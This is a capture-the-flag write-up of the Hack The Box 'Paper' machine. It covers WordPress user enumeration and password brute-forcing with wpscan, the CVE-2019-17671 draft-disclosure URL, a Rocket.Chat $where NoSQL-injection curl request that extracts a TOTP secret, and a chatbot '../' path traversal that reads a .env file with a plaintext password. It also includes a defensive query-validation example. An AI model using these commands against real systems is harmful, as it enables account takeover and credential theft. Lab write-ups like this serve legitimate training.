The landing page is the stock Ubuntu welcome page; run dirsearch to gather some information.
{"metricId":"6793b6fd-c521-4385-9ea0-b743487d53c1","metrics":{"from":"2021-07-01T07:01:26.689Z","to":"2021-07-01T07:29:18.286Z","successfulInstalls":6,"failedInstalls":0}}
Learned a bit of msf usage.
Unfortunately got stuck here, so went back to HTB for guidance.
The hint is "What is the domain for the Wordpress blog?", but what does that have to do with this?
OK, there is one HTB-specific point: the default domain is paper.htb. Starting from that, do a subdomain scan; in fact the name can also be seen in the network traffic.
Note that office.paper has to be accessed over http.
Tried weak passwords on /wp-admin, couldn't get in.
Found wpscan, the official tool for detecting WordPress vulnerabilities.
https://github.com/wpscanteam/wpscan
Kali is great, it ships with the latest version.
wpscan --url http://office.paper
wpscan --url http://office.paper -e p
-e p enumerates plugins; -e vp enumerates vulnerable plugins, but that needs an API token requested from the official site.
There is a theme; search msf for it.
Let's try logging in first: enumerate usernames.
wpscan --url http://derpnstink.local/weblog -e u
Found three users
prisonmike
nick
creedthoughts
wpscan --url http://office.paper -U prisonmike -P /home/gw/桌面/test/fuzzDicts-master/passwordDict/top500.txt
Brute-force the password.
Meanwhile, searched the site for these usernames and found a hint.
It should be about finding a way to view the drafts.
Found CVE-2019-17671, which matches version 5.2.3 exactly: unauthenticated access.
est
Micheal please remove the secret from drafts for gods sake!
Hello employees of Blunder Tiffin,
Due to the orders from higher officials, every employee who were added to this blog is removed and they are migrated to our new chat system.
So, I kindly request you all to take your discussions from the public blog to a more private chat system.
-Nick
# Warning for Michael
Michael, you have to stop putting secrets in the drafts. It is a huge security issue and you have to stop doing it. -Nick
Threat Level Midnight
A MOTION PICTURE SCREENPLAY,
WRITTEN AND DIRECTED BY
MICHAEL SCOTT
[INT:DAY]
Inside the FBI, Agent Michael Scarn sits with his feet up on his desk. His robotic butler Dwigt….
# Secret Registration URL of new Employee chat system
http://chat.office.paper/register/8qozr226AhkCHZdyY
# I am keeping this draft unpublished, as unpublished drafts cannot be accessed by outsiders. I am not that ignorant, Nick.
# Also, stop looking at my drafts. Jeez!
A really annoying gotcha here: the payloads found online all use asc and cannot be exploited; switch to dsc and the drafts become viewable: /?static=1&order=dsc
Got the new URL
http://chat.office.paper/register/8qozr226AhkCHZdyY
This page lags like crazy, I just sat there staring at it. Finally got in by spamming refresh.
Suddenly realized this thing can be hit with a CVE too.
Disable two-factor authentication on the account, then find the administrator's email and that's it.
https://cloud.tencent.com/developer/article/1859035
Threw it to AI to construct the command.
curl -G 'http://chat.office.paper/api/v1/users.list' \
--data-urlencode 'query={"$where":"this.username==='\''admin'\'' && (()=>{ throw this.services.totp.secret })()"}' \
-H 'X-Auth-Token: iUj1AzQIi8o8xPsKp21Ck_A6XypHBkYzYLYlq8zxzj5' \
-H 'X-Requested-With: XMLHttpRequest' \
-H 'Accept-Language: zh-CN' \
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36' \
-H 'X-User-Id: ueBvmYywX7advzTJx' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Referer: http://chat.office.paper/app/api/server/v1/users.js' \
-H 'Cookie: rc_uid=ueBvmYywX7advzTJx; rc_token=iUj1AzQIi8o8xPsKp21Ck_A6XypHBkYzYLYlq8zxzj5'
{"users":[{"_id":"cehLnbjB9xv88JFD4","status":"offline","active":true,"name":"aaa","nameInsensitive":"aaa"},{"_id":"5iP6aLxNrs8E5S47Q","username":"DunMiffsys","status":"offline","active":true,"name":"DunMiff/sys","nameInsensitive":"dunmiff/sys"},{"_id":"SrtTqJwvCRmCNErxD","username":"DwightKSchrute","status":"offline","active":true,"name":"Dwight","avatarETag":"zBgJbDdyr4jyRMpTs","nameInsensitive":"dwight"},{"_id":"W2dajtnh4g9Eakc4d","username":"JIM9334","status":"offline","active":true,"name":"Jim","avatarETag":"DdBhzWmNF84rDipeX","nameInsensitive":"jim"},{"_id":"umhc2LunPqcMxpuhB","username":"Receptionitis15","status":"offline","active":true,"name":"Pam","avatarETag":"8PtGntTXt6HyFMwB3","nameInsensitive":"pam"},{"_id":"ueBvmYywX7advzTJx","status":"online","active":true,"name":"aaa","username":"aaa","nameInsensitive":"aaa"},{"_id":"vzADtHxN58iiaNY95","username":"actuallyoscar","status":"offline","active":true,"name":"Oscar","avatarETag":"eNbvD2htfoiRER4Xc","nameInsensitive":"oscar"},{"_id":"3pACoij7SH35924pr","username":"catlover","status":"offline","active":true,"name":"Angela","avatarETag":"4hEQXscy32FsLJSR7","nameInsensitive":"angela"},{"_id":"w4LmaNZWjyBtDgjpp","username":"creedthoughts","status":"offline","active":true,"name":"Creed","avatarETag":"DduKqSqtQW8eq8fdN","nameInsensitive":"creed"},{"_id":"d22WtYvu9SDvMcTLC","username":"dwightschrute","status":"offline","active":true,"name":"Dwight Schrute","avatarETag":"rAMJJeSFDGziAatoo","nameInsensitive":"dwight 
schrute"},{"_id":"Q74BkesCHPaRKYjak","username":"hrtoby","status":"offline","active":true,"name":"Toby","avatarETag":"CqFFEbHsDwMQnh4Xz","nameInsensitive":"toby"},{"_id":"MdJX6Kdc3STveZu4Y","username":"kellylikescupcakes","status":"offline","active":true,"name":"Kelly","avatarETag":"nyPiX8DDFzg6ZtgjR","nameInsensitive":"kelly"},{"_id":"DPq2mKNh9m5wENM2p","username":"meredithpalmer","status":"offline","active":true,"name":"Meredith","avatarETag":"49pxS3jA7S24KfsG3","nameInsensitive":"meredith"},{"_id":"NQ2JvGXL8gr7msi7o","username":"nick","status":"offline","active":true,"name":"nick","avatarETag":"cNdxrAfP7Pr5WCirT","nameInsensitive":"nick"},{"_id":"PvSX4dgWzQhnmNujT","status":"offline","active":true,"name":"pb","username":"pb","nameInsensitive":"pb"},{"_id":"aLFDk9yzAhxp6JzrJ","username":"phyllisbobvancefromvancerefigeration","status":"offline","active":true,"name":"Phyllis Vance","avatarETag":"XKtDM4fSXZ3Xf2Ncg","nameInsensitive":"phyllis vance"},{"_id":"ps6gjvimJ3DxeZA86","status":"offline","active":true,"name":"Michael Scott","username":"prisonmike","avatarETag":"Lt5nBQ6hccJnrmjqg","nameInsensitive":"michael scott"},{"_id":"siKFfAEiy9JnJwfCk","username":"realastonkutcher","status":"offline","active":true,"name":"Kevin","avatarETag":"WiGi6HYTadKj5Zf9q","nameInsensitive":"kevin"},{"_id":"qzPLDHsqfYEcJTMJu","username":"realmeredithpalmer","status":"offline","active":true,"name":"Meredith Palmer","avatarETag":"tKenMzo44RFRdEPeM","nameInsensitive":"meredith palmer"},{"_id":"WoxmTzWbvoijWkN5X","username":"recyclops","status":"online","active":true,"name":"RecyclopsBot","avatarETag":"L9pEEpwebBTXPKgqJ","nameInsensitive":"recyclopsbot"},{"_id":"rocket.cat","name":"Rocket.Cat","username":"rocket.cat","status":"online","active":true,"avatarETag":null,"nameInsensitive":"rocket.cat"},{"_id":"BcPDYqH4boQNR3nbE","username":"stanhudson","status":"offline","active":true,"name":"Stanley Hudson","avatarETag":"8FkwWpY62pnZ2dQnm","nameInsensitive":"stanley 
hudson"},{"_id":"gtNuENR8pianEYMHt","username":"wuphfryan","status":"offline","active":true,"name":"Ryan","avatarETag":"R4XbB4zfGpJbppFC8","nameInsensitive":"ryan"}],"count":23,"offset":0,"total":23,"success":true}
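Added example (mine, not Rocket.Chat's code and not from the article linked above): the reason the request above is dangerous at all is that an API accepts a client-controlled JSON object as a MongoDB query, so the caller can hand it operators such as $where (server-side JavaScript) and pull out fields it was never meant to see. This is the validation a server should do on a user-supplied query parameter before it gets near the database. The allowed field list and the sample queries are constructed for illustration.

```javascript
// Added example, not Rocket.Chat's own code: validate a client-supplied JSON "query"
// before it is used as a MongoDB filter. Field names below are constructed.

// Fields a caller may filter on; anything else (e.g. services.totp.secret) is rejected.
const ALLOWED_QUERY_FIELDS = new Set(['username', 'name', 'status', 'active']);

// Only plain JSON scalars are accepted as match values; objects could carry operators.
function isPlainScalar(v) {
  return v === null || ['string', 'number', 'boolean'].includes(typeof v);
}

// Parse and validate the raw query string. Returns a plain equality filter or throws.
function sanitizeUserQuery(rawJson) {
  let parsed;
  try {
    parsed = JSON.parse(rawJson);
  } catch (e) {
    throw new Error('query is not valid JSON');
  }
  if (parsed === null || typeof parsed !== 'object' || Array.isArray(parsed)) {
    throw new Error('query must be a JSON object');
  }
  const filter = {};
  for (const [key, value] of Object.entries(parsed)) {
    if (key.startsWith('$')) {
      // $where, $or, $expr, ...: operators are never accepted from the client.
      throw new Error(`operator not allowed in query: ${key}`);
    }
    if (!ALLOWED_QUERY_FIELDS.has(key)) {
      throw new Error(`field not allowed in query: ${key}`);
    }
    if (!isPlainScalar(value)) {
      // {"username": {"$ne": ""}} style nesting is rejected outright.
      throw new Error(`value for ${key} must be a scalar`);
    }
    filter[key] = value;
  }
  return filter;
}

// Wrapper that reports the outcome instead of throwing; the reason string is what
// you would log, since a rejected "$where" from a client is a strong detection signal.
function checkUserQuery(rawJson) {
  try {
    return { ok: true, filter: sanitizeUserQuery(rawJson) };
  } catch (e) {
    return { ok: false, reason: e.message };
  }
}

// Constructed sample inputs: one legitimate filter and three that must be rejected.
const samples = [
  '{"username":"nick"}',
  '{"$where":"this.username===\'admin\'"}',
  '{"username":{"$ne":""}}',
  '{"services.totp.secret":{"$exists":true}}',
];
for (const s of samples) {
  console.log(s, '=>', JSON.stringify(checkUserQuery(s)));
}
```

An allowlist on field names is what actually stops the secret from leaking; rejecting keys that start with `$` alone would still let a caller read any field by name. As a second layer, mongod can be started with server-side JavaScript disabled (`security.javascriptEnabled: false`), so a `$where` that does slip through has nothing to execute.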
Tried it, couldn't get through. Went back and double-checked: the current Rocket.Chat version is 3.16.3, with no good CVE to exploit. Back in the chat room, found a bot with a special feature.
Found that ../ bypasses its list command, giving arbitrary file read.
Read the .env file
<!=====Contents of file ../hubot/.env=====>
export ROCKETCHAT_URL='http://127.0.0.1:48320'
export ROCKETCHAT_USER=recyclops
export ROCKETCHAT_PASSWORD=Queenofblad3s!23
export ROCKETCHAT_USESSL=false
export RESPOND_TO_DM=true
export RESPOND_TO_EDITED=true
export PORT=8000
export BIND_ADDRESS=127.0.0.1
<!=====End of file ../hubot/.env=====>
What is this password for? Its creator is dwight, and we are currently in his directory too; can it be used to log in via ssh?